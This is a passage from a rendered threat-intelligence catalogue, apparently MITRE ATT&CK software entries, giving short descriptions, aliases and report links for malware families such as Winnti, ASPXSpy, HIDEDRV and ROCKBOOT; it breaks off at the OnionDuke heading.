<h3 id="_winnti_s0141"><a class="anchor" href="#_winnti_s0141"></a><a class="link" href="#_winnti_s0141">Winnti - S0141</a></h3>
<div class="paragraph">
<p>Winnti is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, Winnti Group; however, reporting indicates a second distinct group, Axiom, also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: Winnti</p>
</div>
<div class="paragraph">
<p>Winnti - S0141 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Winnti</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1092. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0141">https://attack.mitre.org/wiki/Software/S0141</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/">https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf">http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rtm_s0148"><a class="anchor" href="#_rtm_s0148"></a><a class="link" href="#_rtm_s0148">RTM - S0148</a></h3>
<div class="paragraph">
<p>RTM is custom malware written in Delphi. It is used by the group of the same name (RTM). (Citation: ESET RTM Feb 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: RTM</p>
</div>
<div class="paragraph">
<p>RTM - S0148 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RTM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1093. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0148">https://attack.mitre.org/wiki/Software/S0148</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_callme_s0077"><a class="anchor" href="#_callme_s0077"></a><a class="link" href="#_callme_s0077">CallMe - S0077</a></h3>
<div class="paragraph">
<p>CallMe is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: CallMe</p>
</div>
<div class="paragraph">
<p>CallMe - S0077 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CallMe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1094. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0077">https://attack.mitre.org/wiki/Software/S0077</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidedrv_s0135"><a class="anchor" href="#_hidedrv_s0135"></a><a class="link" href="#_hidedrv_s0135">HIDEDRV - S0135</a></h3>
<div class="paragraph">
<p>HIDEDRV is a rootkit used by APT28. It has been deployed along with Downdelph to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: HIDEDRV</p>
</div>
<div class="paragraph">
<p>HIDEDRV - S0135 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HIDEDRV</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1095. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0135">https://attack.mitre.org/wiki/Software/S0135</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf">http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084"><a class="anchor" href="#_mis_type_s0084"></a><a class="link" href="#_mis_type_s0084">Mis-Type - S0084</a></h3>
<div class="paragraph">
<p>Mis-Type is a backdoor hybrid that was used by Dust Storm in 2012. (Citation: Cylance Dust Storm)</p>
</div>
<div class="paragraph">
<p>Aliases: Mis-Type</p>
</div>
<div class="paragraph">
<p>Mis-Type - S0084 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Mis-Type</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1096. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0084">https://attack.mitre.org/wiki/Software/S0084</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf">https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hikit_s0009"><a class="anchor" href="#_hikit_s0009"></a><a class="link" href="#_hikit_s0009">Hikit - S0009</a></h3>
<div class="paragraph">
<p>Hikit is malware that has been used by (Citation: Axiom) for late-stage persistence and exfiltration after the initial compromise. (Citation: Axiom)</p>
</div>
<div class="paragraph">
<p>Aliases: Hikit</p>
</div>
<div class="paragraph">
<p>Hikit - S0009 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hikit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1097. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0009">https://attack.mitre.org/wiki/Software/S0009</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf">http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aspxspy_s0073"><a class="anchor" href="#_aspxspy_s0073"></a><a class="link" href="#_aspxspy_s0073">ASPXSpy - S0073</a></h3>
<div class="paragraph">
<p>ASPXSpy is a Web shell. It has been modified by Threat Group-3390 actors to create the ASPXTool version. (Citation: Dell TG-3390)</p>
</div>
<div class="paragraph">
<p>Aliases: ASPXSpy, ASPXTool</p>
</div>
<div class="paragraph">
<p>ASPXSpy - S0073 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ASPXSpy</p>
</li>
<li>
<p>ASPXTool</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1098. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0073">https://attack.mitre.org/wiki/Software/S0073</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_seasharpee_s0185"><a class="anchor" href="#_seasharpee_s0185"></a><a class="link" href="#_seasharpee_s0185">SEASHARPEE - S0185</a></h3>
<div class="paragraph">
<p>is a Web shell that has been used by APT34. (Citation: FireEye APT34 Webinar Dec 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: SEASHARPEE</p>
</div>
<div class="paragraph">
<p>SEASHARPEE - S0185 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SEASHARPEE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1099. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0185">https://attack.mitre.org/wiki/Software/S0185</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east">https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018"><a class="anchor" href="#_sykipot_s0018"></a><a class="link" href="#_sykipot_s0018">Sykipot - S0018</a></h3>
<div class="paragraph">
<p>Sykipot is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of Sykipot hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)</p>
</div>
<div class="paragraph">
<p>Aliases: Sykipot</p>
</div>
<div class="paragraph">
<p>Sykipot - S0018 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sykipot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1100. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0018">https://attack.mitre.org/wiki/Software/S0018</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards">https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments">http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186"><a class="anchor" href="#_downpaper_s0186"></a><a class="link" href="#_downpaper_s0186">DownPaper - S0186</a></h3>
<div class="paragraph">
<p>is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: DownPaper</p>
</div>
<div class="paragraph">
<p>DownPaper - S0186 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DownPaper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1101. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0186">https://attack.mitre.org/wiki/Software/S0186</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/wp-content/uploads/2017/12/Charming%20Kitten%202017.pdf">http://www.clearskysec.com/wp-content/uploads/2017/12/Charming%20Kitten%202017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165"><a class="anchor" href="#_osinfo_s0165"></a><a class="link" href="#_osinfo_s0165">OSInfo - S0165</a></h3>
<div class="paragraph">
<p>is a custom tool used by APT3 to do internal discovery on a victim&#8217;s computer and network. (Citation: Symantec Buckeye)</p>
</div>
<div class="paragraph">
<p>Aliases: OSInfo</p>
</div>
<div class="paragraph">
<p>OSInfo - S0165 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OSInfo</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1102. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0165">https://attack.mitre.org/wiki/Software/S0165</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong">http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_glooxmail_s0026"><a class="anchor" href="#_glooxmail_s0026"></a><a class="link" href="#_glooxmail_s0026">GLOOXMAIL - S0026</a></h3>
<div class="paragraph">
<p>GLOOXMAIL is malware used by APT1 that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Aliases: GLOOXMAIL, Trojan.GTALK</p>
</div>
<div class="paragraph">
<p>GLOOXMAIL - S0026 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GLOOXMAIL</p>
</li>
<li>
<p>Trojan.GTALK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1103. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0026">https://attack.mitre.org/wiki/Software/S0026</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_emissary_s0082"><a class="anchor" href="#_emissary_s0082"></a><a class="link" href="#_emissary_s0082">Emissary - S0082</a></h3>
<div class="paragraph">
<p>Emissary is a Trojan that has been used by Lotus Blossom. It shares code with Elise, with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: Emissary</p>
</div>
<div class="paragraph">
<p>Emissary - S0082 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Emissary</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1104. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0082">https://attack.mitre.org/wiki/Software/S0082</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/">http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_miner_c_s0133"><a class="anchor" href="#_miner_c_s0133"></a><a class="link" href="#_miner_c_s0133">Miner-C - S0133</a></h3>
<div class="paragraph">
<p>Miner-C is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)</p>
</div>
<div class="paragraph">
<p>Aliases: Miner-C, Mal/Miner-C, PhotoMiner</p>
</div>
<div class="paragraph">
<p>Miner-C - S0133 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Miner-C</p>
</li>
<li>
<p>Mal/Miner-C</p>
</li>
<li>
<p>PhotoMiner</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1105. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0133">https://attack.mitre.org/wiki/Software/S0133</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml">http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062"><a class="anchor" href="#_dustysky_s0062"></a><a class="link" href="#_dustysky_s0062">DustySky - S0062</a></h3>
<div class="literalblock">
<div class="content">
<pre>(Citation: DustySky) is multi-stage malware written in .NET that has been used by Molerats since May 2015. (Citation: DustySky) (Citation: DustySky)2</pre>
</div>
</div>
<div class="paragraph">
<p>Aliases: (Citation: DustySky), NeD Worm</p>
</div>
<div class="paragraph">
<p>DustySky - S0062 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DustySky</p>
</li>
<li>
<p>NeD Worm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1106. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0062">https://attack.mitre.org/wiki/Software/S0062</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bubblewrap_s0043"><a class="anchor" href="#_bubblewrap_s0043"></a><a class="link" href="#_bubblewrap_s0043">BUBBLEWRAP - S0043</a></h3>
<div class="paragraph">
<p>BUBBLEWRAP is a full-featured, second-stage backdoor used by the admin@338 group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)</p>
</div>
<div class="paragraph">
<p>Aliases: BUBBLEWRAP, Backdoor.APT.FakeWinHTTPHelper</p>
</div>
<div class="paragraph">
<p>BUBBLEWRAP - S0043 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BUBBLEWRAP</p>
</li>
<li>
<p>Backdoor.APT.FakeWinHTTPHelper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1107. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0043">https://attack.mitre.org/wiki/Software/S0043</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pngdowner_s0067"><a class="anchor" href="#_pngdowner_s0067"></a><a class="link" href="#_pngdowner_s0067">pngdowner - S0067</a></h3>
<div class="paragraph">
<p>pngdowner is malware used by Putter Panda. It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-
execute" utility. (Citation: CrowdStrike Putter Panda)</p>
</div>
<div class="paragraph">
<p>Aliases: pngdowner</p>
</div>
<div class="paragraph">
<p>pngdowner - S0067 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>pngdowner</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1108. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0067">https://attack.mitre.org/wiki/Software/S0067</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058"><a class="anchor" href="#_sslmm_s0058"></a><a class="link" href="#_sslmm_s0058">SslMM - S0058</a></h3>
<div class="paragraph">
<p>SslMM is a full-featured backdoor used by Naikon that has multiple variants. (Citation: Baumgartner Naikon 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: SslMM</p>
</div>
<div class="paragraph">
<p>SslMM - S0058 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SslMM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1109. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0058">https://attack.mitre.org/wiki/Software/S0058</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nidiran_s0118"><a class="anchor" href="#_nidiran_s0118"></a><a class="link" href="#_nidiran_s0118">Nidiran - S0118</a></h3>
<div class="paragraph">
<p>Nidiran is a custom backdoor developed and used by Suckfly. It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: Nidiran, Backdoor.Nidiran</p>
</div>
<div class="paragraph">
<p>Nidiran - S0118 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Nidiran</p>
</li>
<li>
<p>Backdoor.Nidiran</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1110. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0118">https://attack.mitre.org/wiki/Software/S0118</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates">http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_mebromi_s0001"><a class="anchor" href="#_trojan_mebromi_s0001"></a><a class="link" href="#_trojan_mebromi_s0001">Trojan.Mebromi - S0001</a></h3>
<div class="paragraph">
<p>Trojan.Mebromi is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)</p>
</div>
<div class="paragraph">
<p>Aliases: Trojan.Mebromi</p>
</div>
<div class="paragraph">
<p>Trojan.Mebromi - S0001 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trojan.Mebromi</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1111. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0001">https://attack.mitre.org/wiki/Software/S0001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/bios-threat-showing-again">http://www.symantec.com/connect/blogs/bios-threat-showing-again</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072"><a class="anchor" href="#_owaauth_s0072"></a><a class="link" href="#_owaauth_s0072">OwaAuth - S0072</a></h3>
<div class="paragraph">
<p>OwaAuth is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by Threat Group-3390. (Citation: Dell TG-3390)</p>
</div>
<div class="paragraph">
<p>Aliases: OwaAuth</p>
</div>
<div class="paragraph">
<p>OwaAuth - S0072 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OwaAuth</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1112. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0072">https://attack.mitre.org/wiki/Software/S0072</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rockboot_s0112"><a class="anchor" href="#_rockboot_s0112"></a><a class="link" href="#_rockboot_s0112">ROCKBOOT - S0112</a></h3>
<div class="paragraph">
<p>ROCKBOOT is a Bootkit that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)</p>
</div>
<div class="paragraph">
<p>Aliases: ROCKBOOT</p>
</div>
<div class="paragraph">
<p>ROCKBOOT - S0112 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ROCKBOOT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1113. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0112">https://attack.mitre.org/wiki/Software/S0112</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html">https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_onionduke_s0052"><a class="anchor" href="#_onionduke_s0052"></a><a class="link" href="#_onionduke_s0052">OnionDuke - S0052</a></h3>
<div class="paragraph">
